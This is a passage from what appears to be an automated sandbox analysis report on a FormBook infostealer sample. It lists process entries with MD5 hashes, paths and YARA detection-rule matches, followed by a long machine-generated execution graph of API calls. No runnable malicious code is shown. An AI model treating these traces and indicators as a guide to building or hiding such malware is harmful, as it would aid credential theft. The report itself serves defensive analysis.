                                                    Commandline:"C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe"
                                                    Imagebase:0xb40000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:4
                                                    Start time:11:59:28
                                                    Start date:09/06/2024
                                                    Path:C:\Windows\SysWOW64\netbtugc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                    Imagebase:0x180000
                                                    File size:22'016 bytes
                                                    MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:6
                                                    Start time:11:59:42
                                                    Start date:09/06/2024
                                                    Path:C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe"
                                                    Imagebase:0xb40000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:8
                                                    Start time:11:59:55
                                                    Start date:09/06/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6de060000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:4%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:2.6%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:174
                                                      execution_graph 98895 a61016 98900 a64ad2 98895->98900 98910 a80ff6 98900->98910 98902 a64ada 98903 a6101b 98902->98903 98920 a64a94 98902->98920 98907 a82f80 98903->98907 99010 a82e84 98907->99010 98909 a61025 98914 a80ffe 98910->98914 98912 a81018 98912->98902 98914->98912 98915 a8101c std::exception::exception 98914->98915 98948 a8594c 98914->98948 98965 a835e1 DecodePointer 98914->98965 98966 a887db RaiseException 98915->98966 98917 a81046 98967 a88711 58 API calls _free 98917->98967 98919 a81058 98919->98902 98921 a64aaf 98920->98921 98922 a64a9d 98920->98922 98924 a64afe 98921->98924 98923 a82f80 __cinit 67 API calls 98922->98923 98923->98921 98976 a677c7 98924->98976 98928 a64b59 98932 a64b86 98928->98932 98994 a67e8c 98928->98994 98930 a64b7a 98998 a67886 98930->98998 98933 a64bf1 GetCurrentProcess IsWow64Process 98932->98933 98935 a9dc8d 98932->98935 98934 a64c0a 98933->98934 98936 a64c20 98934->98936 98937 a64c89 GetSystemInfo 98934->98937 98990 a64c95 98936->98990 98938 a64c56 98937->98938 98938->98903 98941 a64c32 98943 a64c95 2 API calls 98941->98943 98942 a64c7d GetSystemInfo 98944 a64c47 98942->98944 98945 a64c3a GetNativeSystemInfo 98943->98945 98944->98938 98946 a64c4d FreeLibrary 98944->98946 98945->98944 98946->98938 98949 a859c7 98948->98949 98958 a85958 98948->98958 98974 a835e1 DecodePointer 98949->98974 98951 a859cd 98975 a88d68 58 API calls __getptd_noexit 98951->98975 98954 a8598b RtlAllocateHeap 98955 a859bf 98954->98955 98954->98958 98955->98914 98957 a859b3 98972 a88d68 58 API calls __getptd_noexit 98957->98972 98958->98954 98958->98957 98959 a85963 98958->98959 98963 a859b1 98958->98963 98971 a835e1 DecodePointer 98958->98971 98959->98958 98968 a8a3ab 58 API calls __NMSG_WRITE 98959->98968 98969 a8a408 58 API calls 6 library calls 98959->98969 98970 a832df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98959->98970 98973 a88d68 58 API calls __getptd_noexit 98963->98973 98965->98914 98966->98917 98967->98919 98968->98959 98969->98959 98971->98958 98972->98963 98973->98955 98974->98951 98975->98955 98977 a80ff6 Mailbox 59 API calls 98976->98977 98978 a677e8 98977->98978 98979 a80ff6 Mailbox 59 API calls 98978->98979 98980 a64b16 GetVersionExW 98979->98980 98981 a67d2c 98980->98981 98982 a67da5 98981->98982 98983 a67d38 __NMSG_WRITE 98981->98983 98984 a67e8c 59 API calls 98982->98984 98986 a67d73 98983->98986 98987 a67d4e 98983->98987 98985 a67d56 _memmove 98984->98985 98985->98928 99003 a68189 98986->99003 99002 a68087 59 API calls Mailbox 98987->99002 98991 a64c2e 98990->98991 98992 a64c9e LoadLibraryA 98990->98992 98991->98941 98991->98942 98992->98991 98993 a64caf GetProcAddress 98992->98993 98993->98991 98995 a67e9a 98994->98995 98997 a67ea3 _memmove 98994->98997 98995->98997 99006 a67faf 98995->99006 98997->98930 98999 a67894 98998->98999 99000 a67e8c 59 API calls 98999->99000 99001 a678a4 99000->99001 99001->98932 99002->98985 99004 a80ff6 Mailbox 59 API calls 99003->99004 99005 a68193 99004->99005 99005->98985 99007 a67fc2 99006->99007 99009 a67fbf _memmove 99006->99009 99008 a80ff6 Mailbox 59 API calls 99007->99008 99008->99009 99009->98997 99011 a82e90 __initptd 99010->99011 99018 a83457 99011->99018 99017 a82eb7 __initptd 99017->98909 99035 a89e4b 99018->99035 99020 a82e99 99021 a82ec8 DecodePointer DecodePointer 99020->99021 99022 a82ef5 99021->99022 99023 a82ea5 99021->99023 99022->99023 99087 a889e4 59 API calls __ftell_nolock 99022->99087 99032 a82ec2 99023->99032 99025 a82f58 EncodePointer EncodePointer 99025->99023 99026 a82f07 99026->99025 99027 a82f2c 99026->99027 99088 a88aa4 61 API calls 2 library calls 99026->99088 99027->99023 99030 a82f46 EncodePointer 99027->99030 99089 a88aa4 61 API calls 2 library calls 99027->99089 99030->99025 99031 a82f40 99031->99023 99031->99030 99090 a83460 99032->99090 99036 a89e5c 99035->99036 99037 a89e6f EnterCriticalSection 99035->99037 99042 a89ed3 99036->99042 99037->99020 99039 a89e62 99039->99037 99066 a832f5 58 API calls 3 library calls 99039->99066 99043 a89edf __initptd 99042->99043 99044 a89ee8 99043->99044 99045 a89f00 99043->99045 99067 a8a3ab 58 API calls __NMSG_WRITE 99044->99067 99053 a89f21 __initptd 99045->99053 99070 a88a5d 99045->99070 99048 a89eed 99068 a8a408 58 API calls 6 library calls 99048->99068 99051 a89f2b 99056 a89e4b __lock 58 API calls 99051->99056 99052 a89f1c 99076 a88d68 58 API calls __getptd_noexit 99052->99076 99053->99039 99054 a89ef4 99069 a832df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99054->99069 99058 a89f32 99056->99058 99060 a89f3f 99058->99060 99061 a89f57 99058->99061 99077 a8a06b InitializeCriticalSectionAndSpinCount 99060->99077 99078 a82f95 99061->99078 99064 a89f4b 99084 a89f73 LeaveCriticalSection _doexit 99064->99084 99067->99048 99068->99054 99072 a88a6b 99070->99072 99071 a8594c __malloc_crt 58 API calls 99071->99072 99072->99071 99073 a88a9d 99072->99073 99075 a88a7e 99072->99075 99073->99051 99073->99052 99075->99072 99075->99073 99085 a8a372 Sleep 99075->99085 99076->99053 99077->99064 99079 a82f9e RtlFreeHeap 99078->99079 99083 a82fc7 _free 99078->99083 99080 a82fb3 99079->99080 99079->99083 99086 a88d68 58 API calls __getptd_noexit 99080->99086 99082 a82fb9 GetLastError 99082->99083 99083->99064 99084->99053 99085->99075 99086->99082 99087->99026 99088->99027 99089->99031 99093 a89fb5 LeaveCriticalSection 99090->99093 99092 a82ec7 99092->99017 99093->99092 99094 a61066 99099 a6f8cf 99094->99099 99096 a6106c 99097 a82f80 __cinit 67 API calls 99096->99097 99098 a61076 99097->99098 99100 a6f8f0 99099->99100 99132 a80143 99100->99132 99104 a6f937 99105 a677c7 59 API calls 99104->99105 99106 a6f941 99105->99106 99107 a677c7 59 API calls 99106->99107 99108 a6f94b 99107->99108 99109 a677c7 59 API calls 99108->99109 99110 a6f955 99109->99110 99111 a677c7 59 API calls 99110->99111 99112 a6f993 99111->99112 99113 a677c7 59 API calls 99112->99113 99114 a6fa5e 99113->99114 99142 a760e7 99114->99142 99118 a6fa90 99119 a677c7 59 API calls 99118->99119 99120 a6fa9a 99119->99120 99170 a7ffde 99120->99170 99122 a6fae1 99123 a6faf1 GetStdHandle 99122->99123 99124 a6fb3d 99123->99124 99125 aa49d5 99123->99125 99126 a6fb45 OleInitialize 99124->99126 99125->99124 99127 aa49de 99125->99127 99126->99096 99177 ac6dda 64 API calls Mailbox 99127->99177 99129 aa49e5 99178 ac74a9 CreateThread 99129->99178 99131 aa49f1 CloseHandle 99131->99126 99179 a8021c 99132->99179 99135 a8021c 59 API calls 99136 a80185 99135->99136 99137 a677c7 59 API calls 99136->99137 99138 a80191 99137->99138 99139 a67d2c 59 API calls 99138->99139 99140 a6f8f6 99139->99140 99141 a803a2 6 API calls 99140->99141 99141->99104 99143 a677c7 59 API calls 99142->99143 99144 a760f7 99143->99144 99145 a677c7 59 API calls 99144->99145 99146 a760ff 99145->99146 99186 a75bfd 99146->99186 99149 a75bfd 59 API calls 99150 a7610f 99149->99150 99151 a677c7 59 API calls 99150->99151 99152 a7611a 99151->99152 99153 a80ff6 Mailbox 59 API calls 99152->99153 99154 a6fa68 99153->99154 99155 a76259 99154->99155 99156 a76267 99155->99156 99157 a677c7 59 API calls 99156->99157 99158 a76272 99157->99158 99159 a677c7 59 API calls 99158->99159 99160 a7627d 99159->99160 99161 a677c7 59 API calls 99160->99161 99162 a76288 99161->99162 99163 a677c7 59 API calls 99162->99163 99164 a76293 99163->99164 99165 a75bfd 59 API calls 99164->99165 99166 a7629e 99165->99166 99167 a80ff6 Mailbox 59 API calls 99166->99167 99168 a762a5 RegisterWindowMessageW 99167->99168 99168->99118 99171 ab5cc3 99170->99171 99172 a7ffee 99170->99172 99189 ac9d71 60 API calls 99171->99189 99173 a80ff6 Mailbox 59 API calls 99172->99173 99176 a7fff6 99173->99176 99175 ab5cce 99176->99122 99177->99129 99178->99131 99190 ac748f 65 API calls 99178->99190 99180 a677c7 59 API calls 99179->99180 99181 a80227 99180->99181 99182 a677c7 59 API calls 99181->99182 99183 a8022f 99182->99183 99184 a677c7 59 API calls 99183->99184 99185 a8017b 99184->99185 99185->99135 99187 a677c7 59 API calls 99186->99187 99188 a75c05 99187->99188 99188->99149 99189->99175 99191 a61055 99196 a62649 99191->99196 99194 a82f80 __cinit 67 API calls 99195 a61064 99194->99195 99197 a677c7 59 API calls 99196->99197 99198 a626b7 99197->99198 99203 a63582 99198->99203 99201 a62754 99202 a6105a 99201->99202 99206 a63416 59 API calls 2 library calls 99201->99206 99202->99194 99207 a635b0 99203->99207 99206->99201 99208 a635a1 99207->99208 99209 a635bd 99207->99209 99208->99201 99209->99208 99210 a635c4 RegOpenKeyExW 99209->99210 99210->99208 99211 a635de RegQueryValueExW 99210->99211 99212 a63614 RegCloseKey 99211->99212 99213 a635ff 99211->99213 99212->99208 99213->99212 99214 a63633 99215 a6366a 99214->99215 99216 a636e5 99215->99216 99217 a636e7 99215->99217 99218 a63688 99215->99218 99219 a636ca DefWindowProcW 99216->99219 99220 a9d31c 99217->99220 99221 a636ed 99217->99221 99222 a63695 99218->99222 99223 a6375d PostQuitMessage 99218->99223 99224 a636d8 99219->99224 99264 a711d0 10 API calls Mailbox 99220->99264 99225 a63715 SetTimer RegisterWindowMessageW 99221->99225 99226 a636f2 99221->99226 99227 a9d38f 99222->99227 99228 a636a0 99222->99228 99223->99224 99225->99224 99232 a6373e CreatePopupMenu 99225->99232 99230 a9d2bf 99226->99230 99231 a636f9 KillTimer 99226->99231 99279 ac2a16 71 API calls _memset 99227->99279 99233 a63767 99228->99233 99234 a636a8 99228->99234 99239 a9d2f8 MoveWindow 99230->99239 99240 a9d2c4 99230->99240 99259 a644cb Shell_NotifyIconW _memset 99231->99259 99232->99224 99262 a64531 64 API calls _memset 99233->99262 99242 a636b3 99234->99242 99243 a9d374 99234->99243 99236 a9d343 99265 a711f3 341 API calls Mailbox 99236->99265 99239->99224 99247 a9d2c8 99240->99247 99248 a9d2e7 SetFocus 99240->99248 99245 a636be 99242->99245 99250 a6374b 99242->99250 99243->99219 99278 ab817e 59 API calls Mailbox 99243->99278 99244 a9d3a1 99244->99219 99244->99224 99245->99219 99266 a644cb Shell_NotifyIconW _memset 99245->99266 99246 a6375b 99246->99224 99247->99245 99251 a9d2d1 99247->99251 99248->99224 99249 a6370c 99260 a63114 DeleteObject DestroyWindow Mailbox 99249->99260 99261 a645df 81 API calls _memset 99250->99261 99263 a711d0 10 API calls Mailbox 99251->99263 99257 a9d368 99267 a643db 99257->99267 99259->99249 99260->99224 99261->99246 99262->99246 99263->99224 99264->99236 99265->99245 99266->99257 99268 a64406 _memset 99267->99268 99280 a64213 99268->99280 99271 a6448b 99273 a644a5 Shell_NotifyIconW 99271->99273 99274 a644c1 Shell_NotifyIconW 99271->99274 99275 a644b3 99273->99275 99274->99275 99284 a6410d 99275->99284 99277 a644ba 99277->99216 99278->99216 99279->99244 99281 a9d638 99280->99281 99282 a64227 99280->99282 99281->99282 99283 a9d641 DestroyIcon 99281->99283 99282->99271 99306 ac3226 62 API calls _W_store_winword 99282->99306 99283->99282 99285 a64129 99284->99285 99305 a64200 Mailbox 99284->99305 99307 a67b76 99285->99307 99288 a64144 99290 a67d2c 59 API calls 99288->99290 99289 a9d5dd LoadStringW 99292 a9d5f7 99289->99292 99291 a64159 99290->99291 99291->99292 99293 a6416a 99291->99293 99294 a67c8e 59 API calls 99292->99294 99295 a64174 99293->99295 99296 a64205 99293->99296 99299 a9d601 99294->99299 99312 a67c8e 99295->99312 99321 a681a7 99296->99321 99302 a6417e _memset _wcscpy 99299->99302 99325 a67e0b 99299->99325 99301 a9d623 99304 a67e0b 59 API calls 99301->99304 99303 a641e6 Shell_NotifyIconW 99302->99303 99303->99305 99304->99302 99305->99277 99306->99271 99308 a80ff6 Mailbox 59 API calls 99307->99308 99309 a67b9b 99308->99309 99310 a68189 59 API calls 99309->99310 99311 a64137 99310->99311 99311->99288 99311->99289 99313 a67ca0 99312->99313 99314 a9f094 99312->99314 99332 a67bb1 99313->99332 99338 ab8123 59 API calls _memmove 99314->99338 99317 a67cac 99317->99302 99318 a9f09e 99319 a681a7 59 API calls 99318->99319 99320 a9f0a6 Mailbox 99319->99320 99322 a681b2 99321->99322 99323 a681ba 99321->99323 99339 a680d7 59 API calls 2 library calls 99322->99339 99323->99302 99326 a67e1f 99325->99326 99327 a9f173 99325->99327 99340 a67db0 99326->99340 99328 a68189 59 API calls 99327->99328 99331 a9f17e __NMSG_WRITE _memmove 99328->99331 99330 a67e2a 99330->99301 99333 a67be5 _memmove 99332->99333 99334 a67bbf 99332->99334 99333->99317 99334->99333 99335 a80ff6 Mailbox 59 API calls 99334->99335 99336 a67c34 99335->99336 99337 a80ff6 Mailbox 59 API calls 99336->99337 99337->99333 99338->99318 99339->99323 99341 a67dbf __NMSG_WRITE 99340->99341 99342 a68189 59 API calls 99341->99342 99343 a67dd0 _memmove 99341->99343 99344 a9f130 _memmove 99342->99344 99343->99330 99345 3d82410 99359 3d80000 99345->99359 99347 3d8249e 99362 3d82300 99347->99362 99365 3d834d0 GetPEB 99359->99365 99361 3d8068b 99361->99347 99363 3d82309 Sleep 99362->99363 99364 3d82317 99363->99364 99366 3d834fa 99365->99366 99366->99361 99367 a6b56e 99374 a7fb84 99367->99374 99369 a6b584 99383 a6c707 99369->99383 99371 a6b5ac 99373 a6a4e8 99371->99373 99395 aca0b5 89 API calls 4 library calls 99371->99395 99375 a7fba2 99374->99375 99376 a7fb90 99374->99376 99378 a7fbd1 99375->99378 99379 a7fba8 99375->99379 99396 a69e9c 60 API calls Mailbox 99376->99396 99397 a69e9c 60 API calls Mailbox 99378->99397 99380 a80ff6 Mailbox 59 API calls 99379->99380 99382 a7fb9a 99380->99382 99382->99369 99384 a67b76 59 API calls 99383->99384 99385 a6c72c _wcscmp 99383->99385 99384->99385 99387 a6c760 Mailbox 99385->99387 99398 a67f41 99385->99398 99387->99371 99389 a67c8e 59 API calls 99390 aa1ac6 99389->99390 99402 a6859a 68 API calls 99390->99402 99392 aa1ad7 99394 aa1adb Mailbox 99392->99394 99403 a69e9c 60 API calls Mailbox 99392->99403 99394->99371 99395->99373 99396->99382 99397->99382 99399 a67f50 __NMSG_WRITE _memmove 99398->99399 99400 a80ff6 Mailbox 59 API calls 99399->99400 99401 a67f8e 99400->99401 99401->99389 99402->99392 99403->99394 99404 a87e93 99405 a87e9f __initptd 99404->99405 99441 a8a048 GetStartupInfoW 99405->99441 99407 a87ea4 99443 a88dbc GetProcessHeap 99407->99443 99409 a87efc 99410 a87f07 99409->99410 99526 a87fe3 58 API calls 3 library calls 99409->99526 99444 a89d26 99410->99444 99413 a87f0d 99414 a87f18 __RTC_Initialize 99413->99414 99527 a87fe3 58 API calls 3 library calls 99413->99527 99465 a8d812 99414->99465 99417 a87f27 99418 a87f33 GetCommandLineW 99417->99418 99528 a87fe3 58 API calls 3 library calls 99417->99528 99484 a95173 GetEnvironmentStringsW 99418->99484 99421 a87f32 99421->99418 99424 a87f4d 99425 a87f58 99424->99425 99529 a832f5 58 API calls 3 library calls 99424->99529 99494 a94fa8 99425->99494 99428 a87f5e 99429 a87f69 99428->99429 99530 a832f5 58 API calls 3 library calls 99428->99530 99508 a8332f 99429->99508 99432 a87f71 99433 a87f7c __wwincmdln 99432->99433 99531 a832f5 58 API calls 3 library calls 99432->99531 99514 a6492e 99433->99514 99436 a87f90 99437 a87f9f 99436->99437 99532 a83598 58 API calls _doexit 99436->99532 99533 a83320 58 API calls _doexit 99437->99533 99440 a87fa4 __initptd 99442 a8a05e 99441->99442 99442->99407 99443->99409 99534 a833c7 36 API calls 2 library calls 99444->99534 99446 a89d2b 99535 a89f7c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 99446->99535 99448 a89d30 99449 a89d34 99448->99449 99537 a89fca TlsAlloc 99448->99537 99536 a89d9c 61 API calls 2 library calls 99449->99536 99452 a89d39 99452->99413 99453 a89d46 99453->99449 99454 a89d51 99453->99454 99538 a88a15 99454->99538 99457 a89d93 99546 a89d9c 61 API calls 2 library calls 99457->99546 99460 a89d98 99460->99413 99461 a89d72 99461->99457 99462 a89d78 99461->99462 99545 a89c73 58 API calls 3 library calls 99462->99545 99464 a89d80 GetCurrentThreadId 99464->99413 99466 a8d81e __initptd 99465->99466 99467 a89e4b __lock 58 API calls 99466->99467 99468 a8d825 99467->99468 99469 a88a15 __calloc_crt 58 API calls 99468->99469 99470 a8d836 99469->99470 99471 a8d8a1 GetStartupInfoW 99470->99471 99472 a8d841 __initptd @_EH4_CallFilterFunc@8 99470->99472 99478 a8d8b6 99471->99478 99479 a8d9e5 99471->99479 99472->99417 99473 a8daad 99560 a8dabd LeaveCriticalSection _doexit 99473->99560 99475 a88a15 __calloc_crt 58 API calls 99475->99478 99476 a8da32 GetStdHandle 99476->99479 99477 a8da45 GetFileType 99477->99479 99478->99475 99478->99479 99481 a8d904 99478->99481 99479->99473 99479->99476 99479->99477 99559 a8a06b InitializeCriticalSectionAndSpinCount 99479->99559 99480 a8d938 GetFileType 99480->99481 99481->99479 99481->99480 99558 a8a06b InitializeCriticalSectionAndSpinCount 99481->99558 99485 a87f43 99484->99485 99486 a95184 99484->99486 99490 a94d6b GetModuleFileNameW 99485->99490 99487 a88a5d __malloc_crt 58 API calls 99486->99487 99488 a951aa _memmove 99487->99488 99489 a951c0 FreeEnvironmentStringsW 99488->99489 99489->99485 99491 a94d9f _wparse_cmdline 99490->99491 99492 a88a5d __malloc_crt 58 API calls 99491->99492 99493 a94ddf _wparse_cmdline 99491->99493 99492->99493 99493->99424 99495 a94fb9 99494->99495 99496 a94fc1 __NMSG_WRITE 99494->99496 99495->99428 99497 a88a15 __calloc_crt 58 API calls 99496->99497 99498 a94fea __NMSG_WRITE 99497->99498 99498->99495 99499 a95041 99498->99499 99501 a88a15 __calloc_crt 58 API calls 99498->99501 99502 a95066 99498->99502 99505 a9507d 99498->99505 99561 a94857 58 API calls __ftell_nolock 99498->99561 99500 a82f95 _free 58 API calls 99499->99500 99500->99495 99501->99498 99503 a82f95 _free 58 API calls 99502->99503 99503->99495 99562 a89006 IsProcessorFeaturePresent 99505->99562 99507 a95089 99507->99428 99510 a8333b __IsNonwritableInCurrentImage 99508->99510 99585 a8a711 99510->99585 99511 a83359 __initterm_e 99512 a82f80 __cinit 67 API calls 99511->99512 99513 a83378 __cinit __IsNonwritableInCurrentImage 99511->99513 99512->99513 99513->99432 99515 a649e7 99514->99515 99516 a64948 99514->99516 99515->99436 99517 a64982 IsThemeActive 99516->99517 99588 a835ac 99517->99588 99521 a649ae 99600 a64a5b SystemParametersInfoW SystemParametersInfoW 99521->99600 99523 a649ba 99601 a63b4c 99523->99601 99525 a649c2 SystemParametersInfoW 99525->99515 99526->99410 99527->99414 99528->99421 99532->99437 99533->99440 99534->99446 99535->99448 99536->99452 99537->99453 99539 a88a1c 99538->99539 99541 a88a57 99539->99541 99543 a88a3a 99539->99543 99547 a95446 99539->99547 99541->99457 99544 a8a026 TlsSetValue 99541->99544 99543->99539 99543->99541 99555 a8a372 Sleep 99543->99555 99544->99461 99545->99464 99546->99460 99548 a95451 99547->99548 99550 a9546c 99547->99550 99549 a9545d 99548->99549 99548->99550 99556 a88d68 58 API calls __getptd_noexit 99549->99556 99552 a9547c HeapAlloc 99550->99552 99553 a95462 99550->99553 99557 a835e1 DecodePointer 99550->99557 99552->99550 99552->99553 99553->99539 99555->99543 99556->99553 99557->99550 99558->99481 99559->99479 99560->99472 99561->99498 99563 a89011 99562->99563 99568 a88e99 99563->99568 99567 a8902c 99567->99507 99569 a88eb3 _memset __call_reportfault 99568->99569 99570 a88ed3 IsDebuggerPresent 99569->99570 99576 a8a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 99570->99576 99573 a88f97 __call_reportfault 99577 a8c836 99573->99577 99574 a88fba 99575 a8a380 GetCurrentProcess TerminateProcess 99574->99575 99575->99567 99576->99573 99578 a8c83e 99577->99578 99579 a8c840 IsProcessorFeaturePresent 99577->99579 99578->99574 99581 a95b5a 99579->99581 99584 a95b09 5 API calls 2 library calls 99581->99584 99583 a95c3d 99583->99574 99584->99583 99586 a8a714 EncodePointer 99585->99586 99586->99586 99587 a8a72e 99586->99587 99587->99511 99589 a89e4b __lock 58 API calls 99588->99589 99590 a835b7 DecodePointer EncodePointer 99589->99590 99653 a89fb5 LeaveCriticalSection 99590->99653 99592 a649a7 99593 a83614 99592->99593 99594 a83638 99593->99594 99595 a8361e 99593->99595 99594->99521 99595->99594 99654 a88d68 58 API calls __getptd_noexit 99595->99654 99597 a83628 99655 a88ff6 9 API calls __ftell_nolock 99597->99655 99599 a83633 99599->99521 99600->99523 99602 a63b59 __ftell_nolock 99601->99602 99603 a677c7 59 API calls 99602->99603 99604 a63b63 GetCurrentDirectoryW 99603->99604 99656 a63778 99604->99656 99606 a63b8c IsDebuggerPresent 99607 a9d4ad MessageBoxA 99606->99607 99608 a63b9a 99606->99608 99610 a9d4c7 99607->99610 99608->99610 99611 a63bb7 99608->99611 99640 a63c73 99608->99640 99609 a63c7a SetCurrentDirectoryW 99612 a63c87 Mailbox 99609->99612 99855 a67373 59 API calls Mailbox 99610->99855 99737 a673e5 99611->99737 99612->99525 99615 a9d4d7 99620 a9d4ed SetCurrentDirectoryW 99615->99620 99617 a63bd5 GetFullPathNameW 99618 a67d2c 59 API calls 99617->99618 99619 a63c10 99618->99619 99753 a70a8d 99619->99753 99620->99612 99623 a63c2e 99624 a63c38 99623->99624 99856 ac4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 99623->99856 99769 a63a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 99624->99769 99627 a9d50a 99627->99624 99630 a9d51b 99627->99630 99857 a64864 99630->99857 99640->99609 99653->99592 99654->99597 99655->99599 99657 a677c7 59 API calls 99656->99657 99658 a6378e 99657->99658 99864 a63d43 99658->99864 99660 a637ac 99661 a64864 61 API calls 99660->99661 99662 a637c0 99661->99662 99663 a67f41 59 API calls 99662->99663 99664 a637cd 99663->99664 99878 a64f3d 99664->99878 99667 a9d3ae 99945 ac97e5 99667->99945 99669 a637ee Mailbox 99672 a681a7 59 API calls 99669->99672 99671 a9d3cd 99674 a82f95 _free 58 API calls 99671->99674 99675 a63801 99672->99675 99677 a9d3da 99674->99677 99902 a693ea 99675->99902 99678 a64faa 84 API calls 99677->99678 99680 a9d3e3 99678->99680 99684 a63ee2 59 API calls 99680->99684 99681 a67f41 59 API calls 99682 a6381a 99681->99682 99905 a68620 99682->99905 99686 a9d3fe 99684->99686 99685 a6382c Mailbox 99687 a67f41 59 API calls 99685->99687 99688 a63ee2 59 API calls 99686->99688 99689 a63852 99687->99689 99690 a9d41a 99688->99690 99691 a68620 69 API calls 99689->99691 99692 a64864 61 API calls 99690->99692 99694 a63861 Mailbox 99691->99694 99693 a9d43f 99692->99693 99695 a63ee2 59 API calls 99693->99695 99696 a677c7 59 API calls 99694->99696 99697 a9d44b 99695->99697 99699 a6387f 99696->99699 99698 a681a7 59 API calls 99697->99698 99700 a9d459 99698->99700 99909 a63ee2 99699->99909 99702 a63ee2 59 API calls 99700->99702 99704 a9d468 99702->99704 99710 a681a7 59 API calls 99704->99710 99706 a63899 99706->99680 99707 a638a3 99706->99707 99708 a8313d _W_store_winword 60 API calls 99707->99708 99709 a638ae 99708->99709 99709->99686 99711 a638b8 99709->99711 99712 a9d48a 99710->99712 99713 a8313d _W_store_winword 60 API calls 99711->99713 99714 a63ee2 59 API calls 99712->99714 99715 a638c3 99713->99715 99716 a9d497 99714->99716 99715->99690 99717 a638cd 99715->99717 99716->99716 99718 a8313d _W_store_winword 60 API calls 99717->99718 99719 a638d8 99718->99719 99719->99704 99720 a63919 99719->99720 99722 a63ee2 59 API calls 99719->99722 99720->99704 99721 a63926 99720->99721 99925 a6942e 99721->99925 99723 a638fc 99722->99723 99725 a681a7 59 API calls 99723->99725 99727 a6390a 99725->99727 99729 a63ee2 59 API calls 99727->99729 99729->99720 99732 a693ea 59 API calls 99734 a63961 99732->99734 99733 a69040 60 API calls 99733->99734 99734->99732 99734->99733 99735 a63ee2 59 API calls 99734->99735 99736 a639a7 Mailbox 99734->99736 99735->99734 99736->99606 99738 a673f2 __ftell_nolock 99737->99738 99739 a9ee4b _memset 99738->99739 99740 a6740b 99738->99740 99742 a9ee67 GetOpenFileNameW 99739->99742 100755 a648ae 99740->100755 99744 a9eeb6 99742->99744 99746 a67d2c 59 API calls 99744->99746 99749 a9eecb 99746->99749 99749->99749 99750 a67429 100783 a669ca 99750->100783 99754 a70a9a __ftell_nolock 99753->99754 101101 a66ee0 99754->101101 99756 a70a9f 99768 a63c26 99756->99768 101112 a712fe 89 API calls 99756->101112 99758 a70aac 99758->99768 101113 a74047 91 API calls Mailbox 99758->101113 99760 a70ab5 99761 a70ab9 GetFullPathNameW 99760->99761 99760->99768 99762 a67d2c 59 API calls 99761->99762 99763 a70ae5 99762->99763 99768->99615 99768->99623 99770 a63ac2 LoadImageW RegisterClassExW 99769->99770 99771 a9d49c 99769->99771 101146 a63041 7 